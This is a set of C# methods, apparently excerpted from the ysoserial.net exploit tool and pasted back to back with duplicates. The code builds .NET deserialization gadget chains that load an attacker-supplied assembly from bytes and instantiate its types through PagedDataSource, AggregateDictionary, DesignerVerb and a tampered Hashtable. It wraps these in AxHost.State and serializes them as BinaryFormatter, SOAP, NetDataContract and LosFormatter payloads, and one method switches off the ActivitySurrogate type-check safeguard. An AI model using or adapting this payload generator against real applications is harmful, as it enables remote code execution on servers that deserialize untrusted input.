public void GetObjectData(SerializationInfo info, StreamingContext context)
{
System.Diagnostics.Trace.WriteLine("In GetObjectData");
List <object> ls = GadgetChains();
// Wrap the object inside a DataSet. This is so we can use the custom
// surrogate selector. Idiocy added and removed here.
/*
* info.SetType(typeof(System.Data.DataSet));
* info.AddValue("DataSet.RemotingFormat", System.Data.SerializationFormat.Binary);
* info.AddValue("DataSet.DataSetName", "");
* info.AddValue("DataSet.Namespace", "");
* info.AddValue("DataSet.Prefix", "");
* info.AddValue("DataSet.CaseSensitive", false);
* info.AddValue("DataSet.LocaleLCID", 0x409);
* info.AddValue("DataSet.EnforceConstraints", false);
* info.AddValue("DataSet.ExtendedProperties", (PropertyCollection)null);
* info.AddValue("DataSet.Tables.Count", 1);
* BinaryFormatter fmt = new BinaryFormatter();
* MemoryStream stm = new MemoryStream();
* fmt.SurrogateSelector = new MySurrogateSelector();
* fmt.Serialize(stm, ls);
* info.AddValue("DataSet.Tables_0", stm.ToArray());
* //*/
//* saving around 404 characters by using AxHost.State instead of DataSet
// However, DataSet can apply to more applications
// https://docs.microsoft.com/en-us/dotnet/api/system.windows.forms.axhost.state
// vs
// https://docs.microsoft.com/en-us/dotnet/api/system.data.dataset
MemoryStream stm = new MemoryStream();
if (inputArgs.Minify)
{
ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal = new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter();
fmtLocal.SurrogateSelector = new MySurrogateSelector();
fmtLocal.Serialize(stm, ls);
}
else
{
BinaryFormatter fmt = new BinaryFormatter();
fmt.SurrogateSelector = new MySurrogateSelector();
fmt.Serialize(stm, ls);
}
info.SetType(typeof(System.Windows.Forms.AxHost.State));
info.AddValue("PropertyBagBinary", stm.ToArray());
//*/
}
public DataSetMarshal(object fakeTable, InputArgs inputArgs)
{
MemoryStream stm = new MemoryStream();
if (inputArgs.Minify)
{
ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal = new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter();
fmtLocal.Serialize(stm, fakeTable);
}
else
{
BinaryFormatter fmt = new BinaryFormatter();
fmt.Serialize(stm, fakeTable);
}
SetFakeTable(stm.ToArray());
}
public AxHostStateMarshal(object fakePropertyBagBinary, InputArgs inputArgs)
{
MemoryStream stm = new MemoryStream();
if (inputArgs.Minify)
{
ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal = new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter();
fmtLocal.Serialize(stm, fakePropertyBagBinary);
}
else
{
BinaryFormatter fmt = new BinaryFormatter();
fmt.Serialize(stm, fakePropertyBagBinary);
}
SetFakePropertyBagBinary(stm.ToArray());
}
public void GetObjectData(SerializationInfo info, StreamingContext context)
{
System.Diagnostics.Trace.WriteLine("In GetObjectData");
DesignerVerb verb = null;
Hashtable ht = null;
List <object> ls = null;
//variant 2, old technique
if (this.variant_number == 2)
{
// Build a chain to map a byte array to creating an instance of a class.
// byte[] -> Assembly.Load -> Assembly -> Assembly.GetType -> Type[] -> Activator.CreateInstance -> Win!
List <byte[]> data = new List <byte[]>();
data.Add(this.assemblyBytes);
var e1 = data.Select(Assembly.Load);
Func <Assembly, IEnumerable <Type> > map_type = (Func <Assembly, IEnumerable <Type> >)Delegate.CreateDelegate(typeof(Func <Assembly, IEnumerable <Type> >), typeof(Assembly).GetMethod("GetTypes"));
var e2 = e1.SelectMany(map_type);
var e3 = e2.Select(Activator.CreateInstance);
// PagedDataSource maps an arbitrary IEnumerable to an ICollection
PagedDataSource pds = new PagedDataSource()
{
DataSource = e3
};
// AggregateDictionary maps an arbitrary ICollection to an IDictionary
// Class is internal so need to use reflection.
IDictionary dict = (IDictionary)Activator.CreateInstance(typeof(int).Assembly.GetType("System.Runtime.Remoting.Channels.AggregateDictionary"), pds);
// DesignerVerb queries a value from an IDictionary when its ToString is called. This results in the linq enumerator being walked.
verb = new DesignerVerb("", null);
// Need to insert IDictionary using reflection.
typeof(MenuCommand).GetField("properties", BindingFlags.NonPublic | BindingFlags.Instance).SetValue(verb, dict);
// Pre-load objects, this ensures they're fixed up before building the hash table.
ls = new List <object>();
ls.Add(e1);
ls.Add(e2);
ls.Add(e3);
ls.Add(pds);
ls.Add(verb);
ls.Add(dict);
}
//Default, use compatible mode.
//Old technique contains a compiler-generated class [System.Core]System.Linq.Enumerable+<SelectManyIterator>d__[Compiler_Generated_Class_SEQ]`2,
//the Compiler_Generated_Class_SEQ may NOT same in different version of .net framework.
//For example, in .net framework 4.6 was 16,and 17 in .net framework 4.7.
//New technique use [System.Core]System.Linq.Enumerable+WhereSelectEnumerableIterator`2 only to fix it.
//It make compatible from v3.5 to lastest(needs to using v3.5 compiler, and may also need to call disable type check first if target runtime was v4.8+).
//Execution chain: Assembly.Load(byte[]).GetTypes().GetEnumerator().{MoveNext(),get_Current()} -> Activator.CreateInstance() -> Win!
else
{
byte[][] e1 = new byte[][] { assemblyBytes };
IEnumerable <Assembly> e2 = CreateWhereSelectEnumerableIterator <byte[], Assembly>(e1, null, Assembly.Load);
IEnumerable <IEnumerable <Type> > e3 = CreateWhereSelectEnumerableIterator <Assembly, IEnumerable <Type> >(e2,
null,
(Func <Assembly, IEnumerable <Type> >)Delegate.CreateDelegate
(
typeof(Func <Assembly, IEnumerable <Type> >),
typeof(Assembly).GetMethod("GetTypes")
)
);
IEnumerable <IEnumerator <Type> > e4 = CreateWhereSelectEnumerableIterator <IEnumerable <Type>, IEnumerator <Type> >(e3,
null,
(Func <IEnumerable <Type>, IEnumerator <Type> >)Delegate.CreateDelegate
(
typeof(Func <IEnumerable <Type>, IEnumerator <Type> >),
typeof(IEnumerable <Type>).GetMethod("GetEnumerator")
)
);
//bool MoveNext(this) => Func<IEnumerator<Type>,bool> => predicate
//Type get_Current(this) => Func<IEnumerator<Type>,Type> => selector
//
//WhereSelectEnumerableIterator`2.MoveNext =>
// if(predicate(IEnumerator<Type>)) {selector(IEnumerator<Type>);} =>
// IEnumerator<Type>.MoveNext();return IEnumerator<Type>.Current;
IEnumerable <Type> e5 = CreateWhereSelectEnumerableIterator <IEnumerator <Type>, Type>(e4,
(Func <IEnumerator <Type>, bool>)Delegate.CreateDelegate
(
typeof(Func <IEnumerator <Type>, bool>),
typeof(IEnumerator).GetMethod("MoveNext")
),
(Func <IEnumerator <Type>, Type>)Delegate.CreateDelegate
(
typeof(Func <IEnumerator <Type>, Type>),
typeof(IEnumerator <Type>).GetProperty("Current").GetGetMethod()
)
);
IEnumerable <object> end = CreateWhereSelectEnumerableIterator <Type, object>(e5, null, Activator.CreateInstance);
// PagedDataSource maps an arbitrary IEnumerable to an ICollection
PagedDataSource pds = new PagedDataSource()
{
DataSource = end
};
// AggregateDictionary maps an arbitrary ICollection to an IDictionary
// Class is internal so need to use reflection.
IDictionary dict = (IDictionary)Activator.CreateInstance(typeof(int).Assembly.GetType("System.Runtime.Remoting.Channels.AggregateDictionary"), pds);
// DesignerVerb queries a value from an IDictionary when its ToString is called. This results in the linq enumerator being walked.
verb = new DesignerVerb("", null);
// Need to insert IDictionary using reflection.
typeof(MenuCommand).GetField("properties", BindingFlags.NonPublic | BindingFlags.Instance).SetValue(verb, dict);
// Pre-load objects, this ensures they're fixed up before building the hash table.
ls = new List <object>();
ls.Add(e1);
ls.Add(e2);
ls.Add(e3);
ls.Add(e4);
ls.Add(e5);
ls.Add(end);
ls.Add(pds);
ls.Add(verb);
ls.Add(dict);
}
ht = new Hashtable();
// Add two entries to table.
/*
* ht.Add(verb, "Hello");
* ht.Add("Dummy", "Hello2");
*/
ht.Add(verb, "");
ht.Add("", "");
FieldInfo fi_keys = ht.GetType().GetField("buckets", BindingFlags.NonPublic | BindingFlags.Instance);
Array keys = (Array)fi_keys.GetValue(ht);
FieldInfo fi_key = keys.GetType().GetElementType().GetField("key", BindingFlags.Public | BindingFlags.Instance);
for (int i = 0; i < keys.Length; ++i)
{
object bucket = keys.GetValue(i);
object key = fi_key.GetValue(bucket);
if (key is string)
{
fi_key.SetValue(bucket, verb);
keys.SetValue(bucket, i);
break;
}
}
fi_keys.SetValue(ht, keys);
ls.Add(ht);
// Wrap the object inside a DataSet. This is so we can use the custom
// surrogate selector. Idiocy added and removed here.
/*
* info.SetType(typeof(System.Data.DataSet));
* info.AddValue("DataSet.RemotingFormat", System.Data.SerializationFormat.Binary);
* info.AddValue("DataSet.DataSetName", "");
* info.AddValue("DataSet.Namespace", "");
* info.AddValue("DataSet.Prefix", "");
* info.AddValue("DataSet.CaseSensitive", false);
* info.AddValue("DataSet.LocaleLCID", 0x409);
* info.AddValue("DataSet.EnforceConstraints", false);
* info.AddValue("DataSet.ExtendedProperties", (PropertyCollection)null);
* info.AddValue("DataSet.Tables.Count", 1);
* BinaryFormatter fmt = new BinaryFormatter();
* MemoryStream stm = new MemoryStream();
* fmt.SurrogateSelector = new MySurrogateSelector();
* fmt.Serialize(stm, ls);
* info.AddValue("DataSet.Tables_0", stm.ToArray());
* //*/
//* saving around 404 characters by using AxHost.State instead of DataSet
// However, DataSet can apply to more applications
// https://docs.microsoft.com/en-us/dotnet/api/system.windows.forms.axhost.state
// vs
// https://docs.microsoft.com/en-us/dotnet/api/system.data.dataset
MemoryStream stm = new MemoryStream();
if (inputArgs.Minify)
{
ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal = new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter();
fmtLocal.SurrogateSelector = new MySurrogateSelector();
fmtLocal.Serialize(stm, ls);
}
else
{
BinaryFormatter fmt = new BinaryFormatter();
fmt.SurrogateSelector = new MySurrogateSelector();
fmt.Serialize(stm, ls);
}
info.SetType(typeof(System.Windows.Forms.AxHost.State));
info.AddValue("PropertyBagBinary", stm.ToArray());
//*/
}
public object Serialize(object payloadObj, string formatter, InputArgs inputArgs)
{
// Disable ActivitySurrogate type protections during generation
ConfigurationManager.AppSettings.Set("microsoft:WorkflowComponentModel:DisableActivitySurrogateSelectorTypeCheck", "true");
MemoryStream stream = new MemoryStream();
if (formatter.ToLower().Equals("binaryformatter"))
{
BinaryFormatter fmt = new BinaryFormatter();
if (inputArgs.Minify)
{
ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal = new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter();
fmtLocal.Serialize(stream, payloadObj);
}
else
{
fmt.Serialize(stream, payloadObj);
}
if (inputArgs.Test)
{
try
{
stream.Position = 0;
fmt.Deserialize(stream);
}
catch (Exception err) {
Debugging.ShowErrors(inputArgs, err);
}
}
return(stream.ToArray());
}
/*
* We don't actually need to use ObjectStateFormatter in ysoserial.net because it is the same as LosFormatter without MAC/keys
* else if (formatter.ToLower().Equals("objectstateformatter"))
* {
* ObjectStateFormatter osf = new ObjectStateFormatter();
* osf.Serialize(stream, payloadObj);
* if (inputArgs.Test)
* {
* try
* {
* stream.Position = 0;
* osf.Deserialize(stream);
* }
* catch (Exception err)
* {
* Debugging.ShowErrors(inputArgs, err);
* }
* }
* return stream.ToArray();
* }
*/
else if (formatter.ToLower().Equals("soapformatter"))
{
SoapFormatter sf = new SoapFormatter();
sf.Serialize(stream, payloadObj);
if (inputArgs.Minify)
{
stream.Position = 0;
if (inputArgs.UseSimpleType)
{
stream = XMLMinifier.Minify(stream, new String[] { "Microsoft.PowerShell.Editor" }, null, FormatterType.SoapFormatter, true);
}
else
{
stream = XMLMinifier.Minify(stream, null, null, FormatterType.SoapFormatter, true);
}
}
if (inputArgs.Test)
{
try
{
stream.Position = 0;
sf.Deserialize(stream);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(stream.ToArray());
}
else if (formatter.ToLower().Equals("netdatacontractserializer"))
{
NetDataContractSerializer ndcs = new NetDataContractSerializer();
ndcs.Serialize(stream, payloadObj);
if (inputArgs.Minify)
{
stream.Position = 0;
if (inputArgs.UseSimpleType)
{
stream = XMLMinifier.Minify(stream, new string[] { "mscorlib", "Microsoft.PowerShell.Editor" }, null, FormatterType.NetDataContractXML, true);
}
else
{
stream = XMLMinifier.Minify(stream, null, null, FormatterType.NetDataContractXML, true);
}
}
if (inputArgs.Test)
{
try
{
stream.Position = 0;
ndcs.Deserialize(stream);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(stream.ToArray());
}
else if (formatter.ToLower().Equals("losformatter"))
{
LosFormatter lf = new LosFormatter();
if (inputArgs.Minify)
{
stream = Helpers.ModifiedVulnerableBinaryFormatters.SimpleMinifiedObjectLosFormatter.Serialize(payloadObj);
}
else
{
lf.Serialize(stream, payloadObj);
}
if (inputArgs.Test)
{
try
{
stream.Position = 0;
lf.Deserialize(stream);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(stream.ToArray());
}
else
{
throw new Exception("Formatter not supported");
}
}
public object Serialize(object payloadObj, string formatter, InputArgs inputArgs)
{
MemoryStream stream = new MemoryStream();
if (formatter.ToLower().Equals("binaryformatter"))
{
BinaryFormatter fmt = new BinaryFormatter();
if (inputArgs.Minify)
{
ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal = new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter();
fmtLocal.Serialize(stream, payloadObj);
}
else
{
fmt.Serialize(stream, payloadObj);
}
if (inputArgs.Test)
{
try
{
stream.Position = 0;
if (serializationBinder != null)
{
fmt.Binder = serializationBinder;
}
fmt.Deserialize(stream);
}
catch (Exception err) {
Debugging.ShowErrors(inputArgs, err);
}
}
return(stream.ToArray());
}
/*
* We don't actually need to use ObjectStateFormatter in ysoserial.net because it is the same as LosFormatter without MAC/keys
* else if (formatter.ToLower().Equals("objectstateformatter"))
* {
* ObjectStateFormatter osf = new ObjectStateFormatter();
* osf.Serialize(stream, payloadObj);
* if (inputArgs.Test)
* {
* try
* {
* stream.Position = 0;
* osf.Deserialize(stream);
* }
* catch (Exception err)
* {
* Debugging.ShowErrors(inputArgs, err);
* }
* }
* return stream.ToArray();
* }
*/
else if (formatter.ToLower().Equals("soapformatter"))
{
SoapFormatter sf = new SoapFormatter();
sf.Serialize(stream, payloadObj);
if (inputArgs.Minify)
{
stream.Position = 0;
if (inputArgs.UseSimpleType)
{
stream = XMLMinifier.Minify(stream, new String[] { "Microsoft.PowerShell.Editor" }, null, FormatterType.SoapFormatter, true);
}
else
{
stream = XMLMinifier.Minify(stream, null, null, FormatterType.SoapFormatter, true);
}
}
if (inputArgs.Test)
{
try
{
stream.Position = 0;
if (serializationBinder != null)
{
sf.Binder = serializationBinder;
}
sf.Deserialize(stream);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(stream.ToArray());
}
else if (formatter.ToLower().Equals("netdatacontractserializer"))
{
NetDataContractSerializer ndcs = new NetDataContractSerializer();
ndcs.Serialize(stream, payloadObj);
if (inputArgs.Minify)
{
stream.Position = 0;
if (inputArgs.UseSimpleType)
{
stream = XMLMinifier.Minify(stream, new string[] { "mscorlib", "Microsoft.PowerShell.Editor" }, new string[] { @"\<Signature2[^\/]+<\/Signature2\>" }, FormatterType.NetDataContractXML, true);
}
else
{
stream = XMLMinifier.Minify(stream, null, null, FormatterType.NetDataContractXML, true);
}
}
if (inputArgs.Test)
{
try
{
stream.Position = 0;
if (serializationBinder != null)
{
ndcs.Binder = serializationBinder;
}
ndcs.Deserialize(stream);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(stream.ToArray());
}
else if (formatter.ToLower().Equals("losformatter"))
{
LosFormatter lf = new LosFormatter();
if (inputArgs.Minify)
{
stream = Helpers.ModifiedVulnerableBinaryFormatters.SimpleMinifiedObjectLosFormatter.Serialize(payloadObj);
}
else
{
lf.Serialize(stream, payloadObj);
}
if (inputArgs.Test)
{
try
{
stream.Position = 0;
lf.Deserialize(stream);
}
catch (Exception err)
{
Debugging.ShowErrors(inputArgs, err);
}
}
return(stream.ToArray());
}
else
{
throw new Exception("Formatter not supported");
}
}
